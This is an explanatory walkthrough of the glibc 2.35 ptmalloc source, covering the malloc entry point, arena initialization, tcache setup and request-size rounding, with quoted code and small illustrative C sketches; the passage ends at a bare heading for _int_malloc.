ptmalloc Source Code Analysis

libc2.35 ptmalloc

When people think of ptmalloc, the first thing that comes to mind is malloc(), so the analysis starts there.

malloc.c/__libc_malloc

__libc_malloc is the entry point of malloc, so we start here.

void *

__libc_malloc (size_t bytes)

{

mstate ar_ptr;

void *victim;

_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,

"PTRDIFF_MAX is not more than half of SIZE_MAX");

if (!__malloc_initialized)

ptmalloc_init ();

#if USE_TCACHE

/* int_free also calls request2size, be careful to not pad twice. */

size_t tbytes;

if (!checked_request2size (bytes, &tbytes))

{

__set_errno (ENOMEM);

return NULL;

}

size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;

if (tc_idx < mp_.tcache_bins

&& tcache

&& tcache->counts[tc_idx] > 0)

{

victim = tcache_get (tc_idx);

return tag_new_usable (victim);

}

DIAG_POP_NEEDS_COMMENT;

#endif

if (SINGLE_THREAD_P)

{

victim = tag_new_usable (_int_malloc (&main_arena, bytes));

assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||

&main_arena == arena_for_chunk (mem2chunk (victim)));

return victim;

}

arena_get (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);

/* Retry with another arena only if we were able to find a usable arena

before. */

if (!victim && ar_ptr != NULL)

{

LIBC_PROBE (memory_malloc_retry, 1, bytes);

ar_ptr = arena_get_retry (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);

}

if (ar_ptr != NULL)

__libc_lock_unlock (ar_ptr->mutex);

victim = tag_new_usable (victim);

assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||

ar_ptr == arena_for_chunk (mem2chunk (victim)));

return victim;

}

_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2, "PTRDIFF_MAX is not more than half of SIZE_MAX");

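SIZE_MAX: the maximum value of size_t (2^64-1 on a typical 64-bit system).

PTRDIFF_MAX: the maximum value of ptrdiff_t (2^63-1 on a typical 64-bit system).

_Static_assert is a compile-time assertion. Here it verifies that the maximum of the pointer-difference type ptrdiff_t (PTRDIFF_MAX) is no more than half the maximum of size_t (SIZE_MAX). Requests larger than PTRDIFF_MAX are rejected later, so adding header and alignment padding to an accepted request cannot overflow size_t.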
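The effect of that bound can be illustrated with a minimal sketch. The helper name padded_size_fits and the constant PAD_SKETCH are assumptions made up for this example and do not exist in glibc; the point is only that a request no larger than PTRDIFF_MAX leaves enough headroom for a small amount of padding.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The same compile-time guarantee that __libc_malloc asserts. */
_Static_assert(PTRDIFF_MAX <= SIZE_MAX / 2,
               "PTRDIFF_MAX is not more than half of SIZE_MAX");

/* Hypothetical upper bound on header plus alignment padding (illustration only). */
#define PAD_SKETCH ((size_t)64)

/* Returns 1 when req is acceptable and req + PAD_SKETCH does not wrap size_t. */
int padded_size_fits(size_t req)
{
    if (req > (size_t)PTRDIFF_MAX)
        return 0;                      /* rejected up front, like checked_request2size */
    return req + PAD_SKETCH > req;     /* cannot wrap, because req <= SIZE_MAX / 2 */
}
```

With this sketch, a request of exactly PTRDIFF_MAX is accepted, while PTRDIFF_MAX + 1 is refused before any padding arithmetic takes place.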

if (!__malloc_initialized) ptmalloc_init ();

- __malloc_initialized starts out false and records whether ptmalloc has been initialized.

- If it has not been initialized, ptmalloc_init is called.

size_t tbytes; if (!checked_request2size (bytes, &tbytes)) { __set_errno (ENOMEM); return NULL; }

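- checked_request2size converts the request bytes into the padded, aligned chunk size tbytes.

- If checked_request2size fails, the branch sets errno to ENOMEM and returns NULL.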

size_t tc_idx = csize2tidx (tbytes); MAYBE_INIT_TCACHE (); DIAG_PUSH_NEEDS_COMMENT; if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] > 0) { victim = tcache_get (tc_idx); return tag_new_usable (victim); } DIAG_POP_NEEDS_COMMENT;

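# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

csize2tidx converts a chunk size into a tcache bin index: roughly, how many MALLOC_ALIGNMENT units the size lies above MINSIZE.

MAYBE_INIT_TCACHE checks whether tcache is still NULL and, if so, calls tcache_init().

DIAG_PUSH_NEEDS_COMMENT and DIAG_POP_NEEDS_COMMENT save and restore the compiler's diagnostic state, so that a warning can be suppressed for the code in between. The names used on this fast path are:

| Variable/macro | Purpose |
| --- | --- |
| tc_idx | tcache bin index for the requested size (computed by csize2tidx) |
| mp_.tcache_bins | Number of tcache bins (64 by default; on 64-bit this covers chunk sizes 0x20 to 0x410, i.e. requests of up to 1032 bytes) |
| tcache | Thread-local cache (a tcache_perthread_struct pointer), one per thread |
| tcache->counts[tc_idx] | Number of free chunks currently held in that bin |
| tcache_get() | Takes one chunk out of the tcache bin (LIFO order) |
| tag_new_usable() | If memory tagging is enabled (for example ARM MTE), gives the block a fresh tag |

Overall, if the tcache bin matching the requested size holds a free chunk, that chunk is taken out and returned to the user directly.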
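The index arithmetic is easy to check by hand. The following sketch assumes the values of a typical 64-bit build (MALLOC_ALIGNMENT of 16, MINSIZE of 32, 64 bins); the _SKETCH constants and function names are illustrative stand-ins, not glibc identifiers.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed values for a typical 64-bit glibc build. */
#define ALIGNMENT_SKETCH   ((size_t)16)
#define MINSIZE_TC_SKETCH  ((size_t)32)
#define TCACHE_BINS_SKETCH ((size_t)64)

/* Same arithmetic as csize2tidx: chunk size -> tcache bin index. */
size_t csize2tidx_sketch(size_t chunk_size)
{
    assert(chunk_size >= MINSIZE_TC_SKETCH);
    return (chunk_size - MINSIZE_TC_SKETCH + ALIGNMENT_SKETCH - 1)
           / ALIGNMENT_SKETCH;
}

/* A chunk size can be served by tcache only if its index is below the bin count. */
int fits_tcache_sketch(size_t chunk_size)
{
    return csize2tidx_sketch(chunk_size) < TCACHE_BINS_SKETCH;
}
```

Under these assumptions a 0x20-byte chunk maps to bin 0, a 0x410-byte chunk to bin 63 (the last one), and a 0x420-byte chunk falls outside the tcache.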

if (SINGLE_THREAD_P) { victim = tag_new_usable (_int_malloc (&main_arena, bytes)); assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || &main_arena == arena_for_chunk (mem2chunk (victim))); return victim; }

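| Variable/function | Purpose |
| --- | --- |
| SINGLE_THREAD_P | Macro that tests whether the process is currently single-threaded (defined(SINGLE_THREAD) ...) |
| _int_malloc(&main_arena, bytes) | Core function that allocates memory from the main arena |
| tag_new_usable() | Handles memory tagging (for example ARM MTE) for the returned block |
| mem2chunk(victim) | Converts the user pointer into a pointer to the internal malloc_chunk structure |
| chunk_is_mmapped() | Checks whether the chunk was allocated directly with mmap (large blocks) |
| arena_for_chunk() | Returns the arena that owns the chunk |
| main_arena | The global main arena, the only heap management structure in single-threaded mode |

#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)

In short, when the program is single-threaded, _int_malloc is called directly to allocate from the main arena, without taking any lock.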

arena_get (ar_ptr, bytes); // acquire the arena lock

#define arena_get(ptr, size) do { \
      ptr = thread_arena; \
      arena_lock (ptr, size); \
  } while (0)

#define arena_lock(ptr, size) do { \
      if (ptr) \
        __libc_lock_lock (ptr->mutex); \
      else \
        ptr = arena_get2 ((size), NULL); \
  } while (0)

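- The arena_lock macro is the core mechanism glibc's malloc uses to manage arena locks, so that an arena can be accessed or obtained safely in a multi-threaded program. It works as follows:

- If the thread already has an arena (ptr is non-NULL), lock it directly so that no other thread can operate on that arena at the same time.

- If the thread has no arena (ptr is NULL), call arena_get2 to obtain a suitable arena, which is returned locked.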

victim = _int_malloc (ar_ptr, bytes); /* Retry with another arena only if we were able to find a usable arena before. */ if (!victim && ar_ptr != NULL) { LIBC_PROBE (memory_malloc_retry, 1, bytes); ar_ptr = arena_get_retry (ar_ptr, bytes); victim = _int_malloc (ar_ptr, bytes); }

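- victim receives the address returned by _int_malloc. If the allocation failed (victim is NULL) and ar_ptr is not NULL, the branch retries the allocation with another arena obtained from arena_get_retry.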

if (ar_ptr != NULL) __libc_lock_unlock (ar_ptr->mutex); victim = tag_new_usable (victim); assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || ar_ptr == arena_for_chunk (mem2chunk (victim))); return victim;

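- The arena lock is released and the block is tagged. The assert then requires that victim is NULL, or that the chunk was allocated with mmap, or that the chunk belongs to ar_ptr. Finally victim is returned.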

arena.c/ptmalloc_init

ptmalloc_init (void)

{

if (__malloc_initialized)

return;

__malloc_initialized = true;

#if USE_TCACHE

tcache_key_initialize ();

#endif

#ifdef USE_MTAG

if ((TUNABLE_GET_FULL (glibc, mem, tagging, int32_t, NULL) & 1) != 0)

{

/* If the tunable says that we should be using tagged memory

and that morecore does not support tagged regions, then

disable it. */

if (__MTAG_SBRK_UNTAGGED)

__always_fail_morecore = true;

mtag_enabled = true;

mtag_mmap_flags = __MTAG_MMAP_FLAGS;

}

#endif

#if defined SHARED && IS_IN (libc)

/* In case this libc copy is in a non-default namespace, never use

brk. Likewise if dlopened from statically linked program. The

generic sbrk implementation also enforces this, but it is not

used on Hurd. */

if (!__libc_initial)

__always_fail_morecore = true;

#endif

thread_arena = &main_arena;

malloc_init_state (&main_arena);

#if HAVE_TUNABLES

TUNABLE_GET (top_pad, size_t, TUNABLE_CALLBACK (set_top_pad));

TUNABLE_GET (perturb, int32_t, TUNABLE_CALLBACK (set_perturb_byte));

TUNABLE_GET (mmap_threshold, size_t, TUNABLE_CALLBACK (set_mmap_threshold));

TUNABLE_GET (trim_threshold, size_t, TUNABLE_CALLBACK (set_trim_threshold));

TUNABLE_GET (mmap_max, int32_t, TUNABLE_CALLBACK (set_mmaps_max));

TUNABLE_GET (arena_max, size_t, TUNABLE_CALLBACK (set_arena_max));

TUNABLE_GET (arena_test, size_t, TUNABLE_CALLBACK (set_arena_test));

# if USE_TCACHE

TUNABLE_GET (tcache_max, size_t, TUNABLE_CALLBACK (set_tcache_max));

TUNABLE_GET (tcache_count, size_t, TUNABLE_CALLBACK (set_tcache_count));

TUNABLE_GET (tcache_unsorted_limit, size_t,

TUNABLE_CALLBACK (set_tcache_unsorted_limit));

# endif

TUNABLE_GET (mxfast, size_t, TUNABLE_CALLBACK (set_mxfast));

TUNABLE_GET (hugetlb, size_t, TUNABLE_CALLBACK (set_hugetlb));

if (mp_.hp_pagesize > 0)

/* Force mmap for main arena instead of sbrk, so hugepages are explicitly

used. */

__always_fail_morecore = true;

#else

if (__glibc_likely (_environ != NULL))

{

char **runp = _environ;

char *envline;

while (__builtin_expect ((envline = next_env_entry (&runp)) != NULL,

0))

{

size_t len = strcspn (envline, "=");

if (envline[len] != '=')

/* This is a "MALLOC_" variable at the end of the string

without a '=' character. Ignore it since otherwise we

will access invalid memory below. */

continue;

switch (len)

{

case 8:

if (!__builtin_expect (__libc_enable_secure, 0))

{

if (memcmp (envline, "TOP_PAD_", 8) == 0)

__libc_mallopt (M_TOP_PAD, atoi (&envline[9]));

else if (memcmp (envline, "PERTURB_", 8) == 0)

__libc_mallopt (M_PERTURB, atoi (&envline[9]));

}

break;

case 9:

if (!__builtin_expect (__libc_enable_secure, 0))

{

if (memcmp (envline, "MMAP_MAX_", 9) == 0)

__libc_mallopt (M_MMAP_MAX, atoi (&envline[10]));

else if (memcmp (envline, "ARENA_MAX", 9) == 0)

__libc_mallopt (M_ARENA_MAX, atoi (&envline[10]));

}

break;

case 10:

if (!__builtin_expect (__libc_enable_secure, 0))

{

if (memcmp (envline, "ARENA_TEST", 10) == 0)

__libc_mallopt (M_ARENA_TEST, atoi (&envline[11]));

}

break;

case 15:

if (!__builtin_expect (__libc_enable_secure, 0))

{

if (memcmp (envline, "TRIM_THRESHOLD_", 15) == 0)

__libc_mallopt (M_TRIM_THRESHOLD, atoi (&envline[16]));

else if (memcmp (envline, "MMAP_THRESHOLD_", 15) == 0)

__libc_mallopt (M_MMAP_THRESHOLD, atoi (&envline[16]));

}

break;

default:

break;

}

}

}

#endif

}

if (__malloc_initialized) return; __malloc_initialized = true;

- Return immediately if initialization has already happened; otherwise set __malloc_initialized to true.

#if USE_TCACHE tcache_key_initialize (); #endif

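- This snippet uses #if and #endif. The conditional-compilation directives are summarized below:

| Directive | Purpose | Pairing |
| --- | --- | --- |
| #if | Starts a conditional block | Must be closed by #endif |
| #ifdef | Tests whether a macro is defined | Must be closed by #endif |
| #ifndef | Tests whether a macro is not defined (often used for include guards) | Must be closed by #endif |
| #else | Alternative branch | Optional |
| #elif | Additional conditional branch | Optional |
| #endif | Ends the conditional block | Closes any of the opening directives above |

- So the snippet means: if the USE_TCACHE macro is nonzero at compile time, the call to tcache_key_initialize() is compiled in.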

#ifdef USE_MTAG if ((TUNABLE_GET_FULL (glibc, mem, tagging, int32_t, NULL) & 1) != 0) { /* If the tunable says that we should be using tagged memory and that morecore does not support tagged regions, then disable it. */ if (__MTAG_SBRK_UNTAGGED) __always_fail_morecore = true; mtag_enabled = true; mtag_mmap_flags = __MTAG_MMAP_FLAGS; } #endif

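- If USE_MTAG is defined and bit 0 of the runtime tunable glibc.mem.tagging (read with TUNABLE_GET_FULL) is set, the branch is entered.

- If memory obtained through sbrk cannot be tagged, that is, __MTAG_SBRK_UNTAGGED is nonzero, morecore is disabled by setting __always_fail_morecore = true.

- Tagged memory is then enabled and the mmap flags are set.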

thread_arena = &main_arena; malloc_init_state (&main_arena);

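- thread_arena is pointed at main_arena, so the thread performing the initialization (the main thread) uses the main arena as its heap management structure.

- malloc_init_state is then called to initialize the main arena.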

#if HAVE_TUNABLES TUNABLE_GET (top_pad, size_t, TUNABLE_CALLBACK (set_top_pad)); TUNABLE_GET (perturb, int32_t, TUNABLE_CALLBACK (set_perturb_byte)); TUNABLE_GET (mmap_threshold, size_t, TUNABLE_CALLBACK (set_mmap_threshold)); TUNABLE_GET (trim_threshold, size_t, TUNABLE_CALLBACK (set_trim_threshold)); TUNABLE_GET (mmap_max, int32_t, TUNABLE_CALLBACK (set_mmaps_max)); TUNABLE_GET (arena_max, size_t, TUNABLE_CALLBACK (set_arena_max)); TUNABLE_GET (arena_test, size_t, TUNABLE_CALLBACK (set_arena_test)); # if USE_TCACHE TUNABLE_GET (tcache_max, size_t, TUNABLE_CALLBACK (set_tcache_max)); TUNABLE_GET (tcache_count, size_t, TUNABLE_CALLBACK (set_tcache_count)); TUNABLE_GET (tcache_unsorted_limit, size_t, TUNABLE_CALLBACK (set_tcache_unsorted_limit)); # endif TUNABLE_GET (mxfast, size_t, TUNABLE_CALLBACK (set_mxfast)); TUNABLE_GET (hugetlb, size_t, TUNABLE_CALLBACK (set_hugetlb)); if (mp_.hp_pagesize > 0) /* Force mmap for main arena instead of sbrk, so hugepages are explicitly used. */ __always_fail_morecore = true;

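- The tunables mechanism lets the allocation policy be adjusted at run time through an environment variable (GLIBC_TUNABLES), without recompiling the program.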

if (__glibc_likely (_environ != NULL)) { char **runp = _environ; char *envline; while (__builtin_expect ((envline = next_env_entry (&runp)) != NULL, 0)) { size_t len = strcspn (envline, "="); if (envline[len] != '=') /* This is a "MALLOC_" variable at the end of the string without a '=' character. Ignore it since otherwise we will access invalid memory below. */ continue; switch (len) { case 8: if (!__builtin_expect (__libc_enable_secure, 0)) { if (memcmp (envline, "TOP_PAD_", 8) == 0) __libc_mallopt (M_TOP_PAD, atoi (&envline[9])); else if (memcmp (envline, "PERTURB_", 8) == 0) __libc_mallopt (M_PERTURB, atoi (&envline[9])); } break; case 9: if (!__builtin_expect (__libc_enable_secure, 0)) { if (memcmp (envline, "MMAP_MAX_", 9) == 0) __libc_mallopt (M_MMAP_MAX, atoi (&envline[10])); else if (memcmp (envline, "ARENA_MAX", 9) == 0) __libc_mallopt (M_ARENA_MAX, atoi (&envline[10])); } break; case 10: if (!__builtin_expect (__libc_enable_secure, 0)) { if (memcmp (envline, "ARENA_TEST", 10) == 0) __libc_mallopt (M_ARENA_TEST, atoi (&envline[11])); } break; case 15: if (!__builtin_expect (__libc_enable_secure, 0)) { if (memcmp (envline, "TRIM_THRESHOLD_", 15) == 0) __libc_mallopt (M_TRIM_THRESHOLD, atoi (&envline[16])); else if (memcmp (envline, "MMAP_THRESHOLD_", 15) == 0) __libc_mallopt (M_MMAP_THRESHOLD, atoi (&envline[16])); } break; default: break; } } }

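This is the #else branch, used only when HAVE_TUNABLES is not set.

- _environ is the environment array. The loop fetches one entry at a time into envline through next_env_entry and stops when NULL is returned. next_env_entry only yields variables whose names start with MALLOC_, and envline points just past that prefix.

- len is the length of the name before the first '='. If there is no '=', the entry is skipped and the loop moves on to the next variable.

- The switch dispatches on the name length, and memcmp then confirms the exact name.

- __builtin_expect(__libc_enable_secure, 0) tests whether the process is running in secure mode (for example a setuid program), in which case these variables are ignored. Otherwise __libc_mallopt applies the value.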
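The parsing pattern (strcspn to find the name length, a switch on that length, then memcmp and atoi) can be sketched as a standalone function. Everything named *_sketch or OPT_* below is invented for this illustration; the sketch takes the text after the MALLOC_ prefix as input and leaves out the secure-mode check and the call to __libc_mallopt.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

enum malloc_env_opt_sketch {
    OPT_NONE, OPT_TOP_PAD, OPT_PERTURB, OPT_MMAP_MAX, OPT_ARENA_MAX,
    OPT_ARENA_TEST, OPT_TRIM_THRESHOLD, OPT_MMAP_THRESHOLD
};

struct malloc_env_sketch {
    enum malloc_env_opt_sketch opt;   /* which option was recognized */
    int value;                        /* parsed integer value, 0 if none */
};

/* envline is the text after "MALLOC_", for example "TOP_PAD_=4096". */
struct malloc_env_sketch parse_malloc_env_sketch(const char *envline)
{
    struct malloc_env_sketch out = { OPT_NONE, 0 };
    size_t len = strcspn(envline, "=");   /* length of the name before '=' */

    if (envline[len] != '=')
        return out;                       /* no '=': skip this entry */

    switch (len) {                        /* cheap dispatch on name length */
    case 8:
        if (memcmp(envline, "TOP_PAD_", 8) == 0)
            out.opt = OPT_TOP_PAD;
        else if (memcmp(envline, "PERTURB_", 8) == 0)
            out.opt = OPT_PERTURB;
        break;
    case 9:
        if (memcmp(envline, "MMAP_MAX_", 9) == 0)
            out.opt = OPT_MMAP_MAX;
        else if (memcmp(envline, "ARENA_MAX", 9) == 0)
            out.opt = OPT_ARENA_MAX;
        break;
    case 10:
        if (memcmp(envline, "ARENA_TEST", 10) == 0)
            out.opt = OPT_ARENA_TEST;
        break;
    case 15:
        if (memcmp(envline, "TRIM_THRESHOLD_", 15) == 0)
            out.opt = OPT_TRIM_THRESHOLD;
        else if (memcmp(envline, "MMAP_THRESHOLD_", 15) == 0)
            out.opt = OPT_MMAP_THRESHOLD;
        break;
    default:
        break;
    }

    if (out.opt != OPT_NONE)
        out.value = atoi(&envline[len + 1]);   /* value starts right after '=' */
    return out;
}
```

Switching on the length first means at most two memcmp calls per entry, which is presumably why the original code is organized this way.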

malloc.c/tcache_key_initialize

tcache_key_initialize initializes tcache_key.

static void

tcache_key_initialize (void)

{

if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK)

!= sizeof (tcache_key))

{

tcache_key = random_bits ();

#if __WORDSIZE == 64

tcache_key = (tcache_key << 32) | random_bits ();

#endif

}

}

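- __getrandom is asked to write sizeof(tcache_key) random bytes into tcache_key. If it does not write that many bytes, the fallback branch is entered.

- random_bits produces a 32-bit random value, which is assigned to tcache_key.

- #if __WORDSIZE == 64 tests whether the build is 64-bit. If so, a second random value is generated and the two are combined: the first becomes the high 32 bits and the second the low 32 bits.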
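The combination step of the fallback path can be shown on its own. In this sketch the two arguments stand in for two successive random_bits() results; the function name combine_key_sketch is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Build a 64-bit key from two 32-bit values, as the 64-bit fallback path does:
   the first value ends up in the high half, the second in the low half. */
uint64_t combine_key_sketch(uint32_t first, uint32_t second)
{
    uint64_t key = first;
    key = (key << 32) | second;
    return key;
}
```

For example, combining 0x12345678 and 0x9abcdef0 gives 0x123456789abcdef0.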

malloc.c/malloc_init_state

Main tasks:

- Initialize the bins

- Set the arena flags

- Initialize the top chunk

malloc_init_state (mstate av)

{

int i;

mbinptr bin;

/* Establish circular links for normal bins */

for (i = 1; i < NBINS; ++i)

{

bin = bin_at (av, i);

bin->fd = bin->bk = bin;

}

#if MORECORE_CONTIGUOUS

if (av != &main_arena)

#endif

set_noncontiguous (av);

if (av == &main_arena)

set_max_fast (DEFAULT_MXFAST);

atomic_store_relaxed (&av->have_fastchunks, false);

av->top = initial_top (av);

}

for (i = 1; i < NBINS; ++i) { bin = bin_at (av, i); bin->fd = bin->bk = bin; }

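- Each bin header is set up as an empty circular list: its fd and bk both point back to the header itself.

#define bin_at(m, i) (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2])) - offsetof (struct malloc_chunk, fd))

bin_at computes the address of a fake chunk header whose fd and bk fields overlap bins[(i - 1) * 2] and bins[(i - 1) * 2 + 1]. i is the bin index (1 is the unsorted bin, 2-63 are small bins, 64-126 are large bins).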
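The self-linking and the bin_at offset arithmetic can be sketched in isolation. The types and names below (chunk_sketch, arena_sketch and the *_sketch functions) are simplified stand-ins invented for this example. Like glibc, the sketch relies on the fake chunk header overlapping the fields that precede the bins array, which is a layout assumption rather than portable C.

```c
#include <assert.h>
#include <stddef.h>

#define NBINS_SKETCH 128

struct chunk_sketch {
    size_t prev_size;
    size_t size;
    struct chunk_sketch *fd;
    struct chunk_sketch *bk;
};

struct arena_sketch {
    /* Two fields before bins, so the fake header of bin 1 stays inside the struct. */
    struct chunk_sketch *top;
    struct chunk_sketch *last_remainder;
    struct chunk_sketch *bins[NBINS_SKETCH * 2 - 2];
};

/* Same arithmetic as bin_at: step back so that ->fd lands on bins[(i - 1) * 2]. */
struct chunk_sketch *bin_at_sketch(struct arena_sketch *av, int i)
{
    assert(i >= 1 && i < NBINS_SKETCH);
    return (struct chunk_sketch *)((char *)&av->bins[(i - 1) * 2]
                                   - offsetof(struct chunk_sketch, fd));
}

/* Make every bin an empty circular list, as malloc_init_state does. */
void init_bins_sketch(struct arena_sketch *av)
{
    for (int i = 1; i < NBINS_SKETCH; ++i) {
        struct chunk_sketch *bin = bin_at_sketch(av, i);
        bin->fd = bin->bk = bin;
    }
}

/* A bin is empty when its last element is the header itself. */
int bin_is_empty_sketch(struct arena_sketch *av, int i)
{
    struct chunk_sketch *bin = bin_at_sketch(av, i);
    return bin->bk == bin;
}

/* Usage example: returns 1 when the aliasing and the empty-list state hold. */
int bins_demo_sketch(void)
{
    static struct arena_sketch av;
    init_bins_sketch(&av);
    struct chunk_sketch *unsorted = bin_at_sketch(&av, 1);
    return (char *)&unsorted->fd == (char *)&av.bins[0]
           && (char *)&unsorted->bk == (char *)&av.bins[1]
           && bin_is_empty_sketch(&av, 1)
           && bin_is_empty_sketch(&av, NBINS_SKETCH - 1);
}
```

Storing only the fd/bk pair per bin and faking the rest of the header halves the memory the bins array would otherwise need, at the cost of this pointer trick.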

#if MORECORE_CONTIGUOUS if (av != &main_arena) #endif set_noncontiguous (av); if (av == &main_arena) set_max_fast (DEFAULT_MXFAST); atomic_store_relaxed (&av->have_fastchunks, false); av->top = initial_top (av);

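- When MORECORE_CONTIGUOUS is set, only non-main arenas are marked non-contiguous; otherwise every arena is.

- For the main arena, the maximum fastbin chunk size is set with set_max_fast (DEFAULT_MXFAST).

- atomic_store_relaxed (&av->have_fastchunks, false); sets have_fastchunks to false, meaning the fastbins hold no chunks.

- av->top = initial_top (av); makes the top chunk initially point at the unsorted bin header, which serves as a placeholder until real memory is obtained.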

malloc.c/checked_request2size

Computes a suitable chunk size for the request and stores the aligned result through the second parameter.

checked_request2size (size_t req, size_t *sz) __nonnull (1)

{

if (__glibc_unlikely (req > PTRDIFF_MAX))

return false;

if (__glibc_unlikely (mtag_enabled))

{

/* Ensure this is not evaluated if !mtag_enabled, see gcc PR 99551. */

asm ("");

req = (req + (__MTAG_GRANULE_SIZE - 1)) &

~(size_t)(__MTAG_GRANULE_SIZE - 1);

}

*sz = request2size (req);

return true;

}

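req is compared with PTRDIFF_MAX; if req is too large, false is returned.

If memory tagging is enabled, req is first rounded up to the tag granule size.

#define request2size(req) \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
   MINSIZE : \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

MALLOC_ALIGN_MASK is used for alignment. If the padded request is smaller than MINSIZE (usually 0x20 on 64-bit), MINSIZE is returned; otherwise the size field overhead (SIZE_SZ) is added and the result is rounded up to the alignment.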
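A few concrete values make the rounding rule clearer. The sketch below hard-codes the constants of a typical 64-bit build (SIZE_SZ of 8, alignment mask of 15, MINSIZE of 32) as assumptions, leaves out the memory-tagging step, and uses hypothetical *_sketch names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed values for a typical 64-bit glibc build. */
#define SIZE_SZ_SKETCH    ((size_t)8)
#define ALIGN_MASK_SKETCH ((size_t)15)
#define MINSIZE_RQ_SKETCH ((size_t)32)

/* Same rule as request2size: add the size field, round up, enforce the minimum. */
size_t request2size_sketch(size_t req)
{
    size_t padded = req + SIZE_SZ_SKETCH + ALIGN_MASK_SKETCH;
    if (padded < MINSIZE_RQ_SKETCH)
        return MINSIZE_RQ_SKETCH;
    return padded & ~ALIGN_MASK_SKETCH;
}

/* Same shape as checked_request2size, without the tagging branch. */
int checked_request2size_sketch(size_t req, size_t *sz)
{
    if (req > (size_t)PTRDIFF_MAX)
        return 0;                 /* too large: the caller sets ENOMEM */
    *sz = request2size_sketch(req);
    return 1;
}
```

Under these assumptions, requests of 0 and 24 bytes both become 0x20-byte chunks, 25 bytes becomes 0x30, and 1032 bytes becomes 0x410.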

malloc.c/tag_new_usable

tag_new_usable (void *ptr)

{

if (__glibc_unlikely (mtag_enabled) && ptr)

{

mchunkptr cp = mem2chunk(ptr);

ptr = __libc_mtag_tag_region (__libc_mtag_new_tag (ptr), memsize (cp));

}

return ptr;

}

ptr = __libc_mtag_tag_region (__libc_mtag_new_tag (ptr), memsize (cp)); assigns a fresh memory tag to the newly allocated block. It only runs when tagging is enabled and ptr is not NULL.

malloc.c/tcache_init

static void

tcache_init(void)

{

mstate ar_ptr;

void *victim = 0;

const size_t bytes = sizeof (tcache_perthread_struct);

if (tcache_shutting_down)

return;

arena_get (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);

if (!victim && ar_ptr != NULL)

{

ar_ptr = arena_get_retry (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);

}

if (ar_ptr != NULL)

__libc_lock_unlock (ar_ptr->mutex);

/* In a low memory situation, we may not be able to allocate memory

- in which case, we just keep trying later. However, we

typically do this very early, so either there is sufficient

memory, or there isn't enough memory to do non-trivial

allocations anyway. */

if (victim)

{

tcache = (tcache_perthread_struct *) victim;

memset (tcache, 0, sizeof (tcache_perthread_struct));

}

}

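tcache_perthread_struct is the management structure of the tcache. It is allocated from the heap the first time a thread uses malloc, so it normally sits at the very start of that heap. Its layout is:

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees. */
  uintptr_t key;
} tcache_entry;

- First an arena is obtained, then a chunk is requested and stored in victim.

- If the request fails, it is retried with another arena.

- Finally the chunk is assigned to the tcache variable and zeroed with memset.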
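How the counts and entries arrays cooperate can be sketched as a small per-size LIFO cache. This is a simplified model with invented *_sketch names: it assumes 64 bins and the default fill limit of 7 per bin, and it omits the key field and the pointer protection that the real tcache_put and tcache_get apply.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TC_BINS_SKETCH 64
#define TC_FILL_SKETCH 7      /* assumed per-bin limit (glibc default tcache_count) */

struct entry_sketch { struct entry_sketch *next; };

struct tcache_sketch {
    uint16_t counts[TC_BINS_SKETCH];
    struct entry_sketch *entries[TC_BINS_SKETCH];
};

/* Zero the structure, as tcache_init does after allocating it. */
void tcache_init_sketch(struct tcache_sketch *tc)
{
    memset(tc, 0, sizeof *tc);
}

/* Push a free block onto bin idx; returns 0 if the bin is full or idx is invalid. */
int tcache_put_sketch(struct tcache_sketch *tc, size_t idx, void *mem)
{
    if (idx >= TC_BINS_SKETCH || tc->counts[idx] >= TC_FILL_SKETCH)
        return 0;
    struct entry_sketch *e = mem;
    e->next = tc->entries[idx];
    tc->entries[idx] = e;
    tc->counts[idx]++;
    return 1;
}

/* Pop the most recently stored block from bin idx, or NULL if it is empty. */
void *tcache_get_sketch(struct tcache_sketch *tc, size_t idx)
{
    if (idx >= TC_BINS_SKETCH || tc->counts[idx] == 0)
        return NULL;
    struct entry_sketch *e = tc->entries[idx];
    tc->entries[idx] = e->next;
    tc->counts[idx]--;
    return e;
}

/* Usage example: returns 1 when blocks come back in LIFO order. */
int tcache_lifo_demo_sketch(void)
{
    struct tcache_sketch tc;
    struct entry_sketch a, b;
    tcache_init_sketch(&tc);
    return tcache_put_sketch(&tc, 3, &a)
           && tcache_put_sketch(&tc, 3, &b)
           && tcache_get_sketch(&tc, 3) == &b
           && tcache_get_sketch(&tc, 3) == &a
           && tcache_get_sketch(&tc, 3) == NULL;
}
```

Because each thread owns its own structure, neither operation needs a lock, which is what makes the fast path in __libc_malloc cheap.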

malloc.c/_int_malloc

